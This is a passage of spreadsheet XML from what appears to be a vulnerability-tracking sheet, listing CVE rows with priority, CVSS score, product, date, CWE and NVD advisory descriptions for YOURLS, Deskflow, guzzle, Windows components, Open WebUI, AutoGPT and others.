          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1744" s="5" t="inlineStr">
        <is>
          <t>YOURLS is a self-hosted, customizable URL shortener written in PHP. From 1.5.1 until 1.10.4, YOURLS stores the HTTP Referer header through yourls_get_referrer(), yourls_sanitize_url_safe(), and yourls_log_redirect(), then aggregates the value in yourls-infos.php and passes the derived domain through yourls_get_domain(), yourls_stats_pie(), and yourls_google_array_to_data_table(). The chart builder concatenates labels into inline JavaScript without JavaScript-string escaping, so an unauthenticated attacker can poison the statistics of an existing short URL with a crafted referrer. When an administrator or public stats-page viewer opens the affected statistics page, attacker-controlled JavaScript executes in the YOURLS origin and can access admin-visible data, the API signature token, and privileged same-origin actions. This issue is fixed in version 1.10.4.</t>
        </is>
      </c>
      <c r="M1744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63135</t>
        </is>
      </c>
    </row>
    <row r="1745">
      <c r="A1745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63376</t>
        </is>
      </c>
      <c r="C1745" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1745" s="5" t="inlineStr"/>
      <c r="F1745" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1745" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1745" s="5" t="inlineStr"/>
      <c r="I1745" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1745" s="5" t="inlineStr"/>
      <c r="K1745" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1745" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">toml-node </t>
        </is>
      </c>
      <c r="M1745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63376</t>
        </is>
      </c>
    </row>
    <row r="1746">
      <c r="A1746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63407</t>
        </is>
      </c>
      <c r="C1746" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1746" s="5" t="inlineStr"/>
      <c r="F1746" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1746" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1746" s="5" t="inlineStr"/>
      <c r="I1746" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1746" s="5" t="inlineStr"/>
      <c r="K1746" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="L1746" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.0-rc.16, the Grav API plugin CorsMiddleware returns Access-Control-Allow-Origin: * and permissive OPTIONS responses for authenticated /api/v1 endpoints. JavaScript from any origin can submit an attacker-obtained JWT through the Authorization or X-API-Token header, read the authenticated response, and perform write operations with the token owner's privileges, enabling data exfiltration and account modification. This issue is fixed in version 1.0.0-rc.16.</t>
        </is>
      </c>
      <c r="M1746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63407</t>
        </is>
      </c>
    </row>
    <row r="1747">
      <c r="A1747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63409</t>
        </is>
      </c>
      <c r="C1747" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1747" s="5" t="inlineStr"/>
      <c r="F1747" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1747" s="5" t="inlineStr"/>
      <c r="H1747" s="5" t="inlineStr"/>
      <c r="I1747" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1747" s="5" t="inlineStr"/>
      <c r="K1747" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1747" s="5" t="inlineStr">
        <is>
          <t>Deskflow is a keyboard and mouse sharing app. From 1.17.0 until continuous build 1.26.0.296, a malicious Deskflow server can send an odd-length DSOP vector to ServerProxy::setOptions() in src/lib/client/ServerProxy.cpp, causing the missing value after the final option key to be read beyond the vector during the PacketStreamFilter::filterEvent to ServerProxy::handleData() to ServerProxy::parseHandshakeMessage() call chain and crash the connected client. This issue is fixed in continuous build 1.26.0.296.</t>
        </is>
      </c>
      <c r="M1747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63409</t>
        </is>
      </c>
    </row>
    <row r="1748">
      <c r="A1748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64380</t>
        </is>
      </c>
      <c r="C1748" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1748" s="5" t="inlineStr"/>
      <c r="F1748" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1748" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1748" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1748" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J1748" s="5" t="inlineStr"/>
      <c r="K1748" s="5" t="inlineStr"/>
      <c r="L1748" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: harden POSIX SID length parsing
posix_info_sid_size() reads sid[1] to obtain the subauthority count,
but its existing boundary check still accepts buffers with only one
remaining byte. Require two bytes before reading sid[1] so all client
paths that reuse the helper reject truncated POSIX SIDs safely.</t>
        </is>
      </c>
      <c r="M1748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64380</t>
        </is>
      </c>
    </row>
    <row r="1749">
      <c r="A1749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6485</t>
        </is>
      </c>
      <c r="C1749" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1749" s="5" t="inlineStr"/>
      <c r="F1749" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1749" s="5" t="inlineStr"/>
      <c r="H1749" s="5" t="inlineStr"/>
      <c r="I1749" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1749" s="5" t="inlineStr"/>
      <c r="K1749" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="L1749" s="5" t="inlineStr">
        <is>
          <t>UEFI BIOS embedded Shell could be used to bypass Secure Boot via shell commands or startup scripts.</t>
        </is>
      </c>
      <c r="M1749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6485</t>
        </is>
      </c>
    </row>
    <row r="1750">
      <c r="A1750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65832</t>
        </is>
      </c>
      <c r="C1750" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1750" s="5" t="inlineStr"/>
      <c r="F1750" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1750" s="5" t="inlineStr"/>
      <c r="H1750" s="5" t="inlineStr"/>
      <c r="I1750" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1750" s="5" t="inlineStr"/>
      <c r="K1750" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-129</t>
        </is>
      </c>
      <c r="L1750" s="5" t="inlineStr">
        <is>
          <t>Deskflow is a keyboard and mouse sharing app. Prior to continuous build 1.26.0.299, a remote unauthenticated Deskflow server can send kMsgDSetOptions (DSOP) values to ServerProxy::setOptions() in src/lib/client/ServerProxy.cpp so that the value following a modifier option poisons m_modifierTranslationTable, after which ServerProxy::translateKey() or ServerProxy::translateModifierMask() indexes the seven-row s_translationTable or s_masks arrays out of bounds, disclosing four bytes at an attacker-selected relative offset or crashing the connected client; an odd option count also causes an out-of-bounds OptionsList read. This issue is fixed in continuous build 1.26.0.299.</t>
        </is>
      </c>
      <c r="M1750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65832</t>
        </is>
      </c>
    </row>
    <row r="1751">
      <c r="A1751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67354</t>
        </is>
      </c>
      <c r="C1751" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1751" s="5" t="inlineStr"/>
      <c r="F1751" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1751" s="5" t="inlineStr"/>
      <c r="H1751" s="5" t="inlineStr"/>
      <c r="I1751" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1751" s="5" t="inlineStr"/>
      <c r="K1751" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L1751" s="5" t="inlineStr">
        <is>
          <t>guzzlehttp/guzzle versions before 7.15.1 contain an information disclosure vulnerability in RedirectMiddleware. When the optional allow_redirects.referer setting is enabled, the middleware copies the URI fragment (the portion after '#') from the referring request into the generated Referer header when following a same-scheme redirect (e.g., HTTPS to HTTPS). An attacker who controls the redirect destination can read this fragment from the incoming Referer header, potentially disclosing one-time login secrets, access tokens, state values, or other sensitive client data to a server never meant to receive it. The referer setting is disabled by default. Fixed in 7.15.1, which strips the fragment before generating the Referer value.</t>
        </is>
      </c>
      <c r="M1751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67354</t>
        </is>
      </c>
    </row>
    <row r="1752">
      <c r="A1752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67355</t>
        </is>
      </c>
      <c r="C1752" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1752" s="5" t="inlineStr"/>
      <c r="F1752" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1752" s="5" t="inlineStr"/>
      <c r="H1752" s="5" t="inlineStr"/>
      <c r="I1752" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1752" s="5" t="inlineStr"/>
      <c r="K1752" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L1752" s="5" t="inlineStr">
        <is>
          <t>guzzlehttp/guzzle versions before 7.15.1 fail to preserve host-only cookie scope, storing the request host in the Domain field instead of marking cookies as host-only. Attackers controlling child hosts can receive host-only cookies intended only for parent hosts, potentially disclosing session identifiers and authorization tokens when the same cookie jar is reused across trust boundaries.</t>
        </is>
      </c>
      <c r="M1752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67355</t>
        </is>
      </c>
    </row>
    <row r="1753">
      <c r="A1753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67398</t>
        </is>
      </c>
      <c r="C1753" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1753" s="5" t="inlineStr"/>
      <c r="F1753" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1753" s="5" t="inlineStr"/>
      <c r="H1753" s="5" t="inlineStr"/>
      <c r="I1753" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1753" s="5" t="inlineStr"/>
      <c r="K1753" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1753" s="5" t="inlineStr">
        <is>
          <t>Missing authorization vulnerability has been discovered in 2Checkout payment gateway of WHMCS from 8.13.0 before 8.13.8, from 9.0.0 before 9.0.8, all other EOL versions from 4.5.0. The vulnerability allows an unauthenticated user to get WHMCS customer's data via 2Checkout payment gateway's endpoint under specific conditions.</t>
        </is>
      </c>
      <c r="M1753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67398</t>
        </is>
      </c>
    </row>
    <row r="1754">
      <c r="A1754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67607</t>
        </is>
      </c>
      <c r="C1754" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1754" s="5" t="inlineStr"/>
      <c r="F1754" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1754" s="5" t="inlineStr"/>
      <c r="H1754" s="5" t="inlineStr"/>
      <c r="I1754" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1754" s="5" t="inlineStr"/>
      <c r="K1754" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1754" s="5" t="inlineStr">
        <is>
          <t>LightFTP 2.3.1 contains a residual race condition vulnerability (an incomplete fix for CVE-2024-11144) in the worker_thread_cleanup() function of ftpserv.c that allows remote unauthenticated attackers to destabilize or crash the daemon by triggering unsynchronized access to shared per-connection state without holding the required mutex lock. Attackers can send a data-transfer command such as LIST followed immediately by ABOR to exploit the missing synchronization on shared context and detached thread id reuse, resulting in daemon destabilization or crash which can lead to a denial of service. The 2.3.1 patch only narrowed the timing window (an extra re-check and reordered cleanup), it never added the missing lock, so the underlying race remains.</t>
        </is>
      </c>
      <c r="M1754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67607</t>
        </is>
      </c>
    </row>
    <row r="1755">
      <c r="A1755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69247</t>
        </is>
      </c>
      <c r="C1755" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1755" s="5" t="inlineStr"/>
      <c r="F1755" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1755" s="5" t="inlineStr">
        <is>
          <t>oracle, openssl, python</t>
        </is>
      </c>
      <c r="H1755" s="5" t="inlineStr"/>
      <c r="I1755" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1755" s="5" t="inlineStr"/>
      <c r="K1755" s="5" t="inlineStr">
        <is>
          <t>CWE-208, CWE-209</t>
        </is>
      </c>
      <c r="L1755" s="5" t="inlineStr">
        <is>
          <t>cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 44.0.0 until 50.0.0, pkcs7_decrypt_der, pkcs7_decrypt_pem, and pkcs7_decrypt_smime reported the outcome of decrypting a RecipientInfo's encryptedKey in several distinguishable ways, one of which disclosed the exact length recovered from the RSA operation. The same distinction was also observable by timing. An application that decrypts attacker-supplied EnvelopedData and reflects the outcome gives the attacker a Bleichenbacher oracle against the content-encryption key. Decryption ran as RSA PKCS#1 v1.5 decrypt of encryptedKey, build an AES cipher from the result, then AES-CBC decrypt and PKCS#7 unpad. Invalid RSA padding, a valid padding with a bad key length, a correct length with a wrong key, and the real key each failed or succeeded differently. Case 1 is reachable only where the linked library lacks implicit rejection: OpenSSL 3.0 and 3.1, LibreSSL, and BoringSSL. Exploitation requires a service that auto-decrypts untrusted EnvelopedData matching the victim certificate and answers adaptively at high volume, such as an S/MIME gateway or mail filter. This issue is fixed in 50.0.0.</t>
        </is>
      </c>
      <c r="M1755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69247</t>
        </is>
      </c>
    </row>
    <row r="1756">
      <c r="A1756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69820</t>
        </is>
      </c>
      <c r="C1756" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1756" s="5" t="inlineStr"/>
      <c r="F1756" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1756" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1756" s="5" t="inlineStr"/>
      <c r="I1756" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1756" s="5" t="inlineStr"/>
      <c r="K1756" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1756" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69820</t>
        </is>
      </c>
    </row>
    <row r="1757">
      <c r="A1757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69846</t>
        </is>
      </c>
      <c r="C1757" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1757" s="5" t="inlineStr"/>
      <c r="F1757" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1757" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1757" s="5" t="inlineStr"/>
      <c r="I1757" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1757" s="5" t="inlineStr"/>
      <c r="K1757" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1757" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t>
        </is>
      </c>
    </row>
    <row r="1758">
      <c r="A1758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69874</t>
        </is>
      </c>
      <c r="C1758" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1758" s="5" t="inlineStr"/>
      <c r="F1758" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1758" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1758" s="5" t="inlineStr"/>
      <c r="I1758" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1758" s="5" t="inlineStr"/>
      <c r="K1758" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1758" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t>
        </is>
      </c>
    </row>
    <row r="1759">
      <c r="A1759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69906</t>
        </is>
      </c>
      <c r="C1759" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1759" s="5" t="inlineStr"/>
      <c r="F1759" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1759" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1759" s="5" t="inlineStr"/>
      <c r="I1759" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1759" s="5" t="inlineStr"/>
      <c r="K1759" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1759" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t>
        </is>
      </c>
    </row>
    <row r="1760">
      <c r="A1760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70486</t>
        </is>
      </c>
      <c r="C1760" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1760" s="5" t="inlineStr"/>
      <c r="F1760" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1760" s="5" t="inlineStr"/>
      <c r="H1760" s="5" t="inlineStr"/>
      <c r="I1760" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1760" s="5" t="inlineStr"/>
      <c r="K1760" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-79</t>
        </is>
      </c>
      <c r="L1760" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.0, the terminal file-preview serveUrl iframe branch always granted allow-same-origin together with allow-scripts for HTML files served from the application origin. Any authenticated user with access to a configured terminal server could cause script in a previewed file to run in the Open WebUI origin, read the victim's session token from localStorage, and take over the account, with possible server-side code execution if the victim was an admin or held workspace.functions. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M1760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70486</t>
        </is>
      </c>
    </row>
    <row r="1761">
      <c r="A1761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71315</t>
        </is>
      </c>
      <c r="C1761" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1761" s="5" t="inlineStr"/>
      <c r="F1761" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1761" s="5" t="inlineStr"/>
      <c r="H1761" s="5" t="inlineStr"/>
      <c r="I1761" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1761" s="5" t="inlineStr"/>
      <c r="K1761" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-863</t>
        </is>
      </c>
      <c r="L1761" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 3.21.7 until 3.21.10 and 4.5.1, mixed-case routeRules keys can fail to match case-folded lookups when router.options.sensitive is false and drop appMiddleware authorization gates. This is caused by an incomplete fix for CVE-2026-53721. This issue is fixed in 3.21.10 and 4.5.1.</t>
        </is>
      </c>
      <c r="M1761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71315</t>
        </is>
      </c>
    </row>
    <row r="1762">
      <c r="A1762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72922</t>
        </is>
      </c>
      <c r="C1762" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1762" s="5" t="inlineStr"/>
      <c r="F1762" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1762" s="5" t="inlineStr"/>
      <c r="H1762" s="5" t="inlineStr"/>
      <c r="I1762" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1762" s="5" t="inlineStr"/>
      <c r="K1762" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1762" s="5" t="inlineStr">
        <is>
          <t>AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Prior to 0.6.70, AutoGPT's autogpt_platform/backend/backend/api/features/integrations/router.py webhook_ingress_generic route selected get_webhook_manager(provider) from the untrusted provider URL segment without verifying webhook.provider, allowing a request to /compass/webhooks/{webhook_id}/ingress to use CompassWebhookManager's inherited no-op BaseWebhooksManager.verify_signature instead of GenericWebhooksManager.verify_signature, bypass X-Webhook-Secret for a configured secret_token, and execute a generic webhook graph as its owner. This issue is fixed in version 0.6.70.</t>
        </is>
      </c>
      <c r="M1762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72922</t>
        </is>
      </c>
    </row>
    <row r="1763">
      <c r="A1763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72958</t>
        </is>
      </c>
      <c r="C1763" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1763" s="5" t="inlineStr"/>
      <c r="F1763" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1763" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1763" s="5" t="inlineStr"/>
      <c r="I1763" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1763" s="5" t="inlineStr"/>
      <c r="K1763" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1763" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t>
        </is>
      </c>
    </row>
    <row r="1764">
      <c r="A1764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72961</t>
        </is>
      </c>
      <c r="C1764" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1764" s="5" t="inlineStr"/>
      <c r="F1764" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1764" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1764" s="5" t="inlineStr"/>
      <c r="I1764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1764" s="5" t="inlineStr"/>
      <c r="K1764" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1764" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t>
        </is>
      </c>
    </row>
    <row r="1765">
      <c r="A1765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72962</t>
        </is>
      </c>
      <c r="C1765" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1765" s="5" t="inlineStr"/>
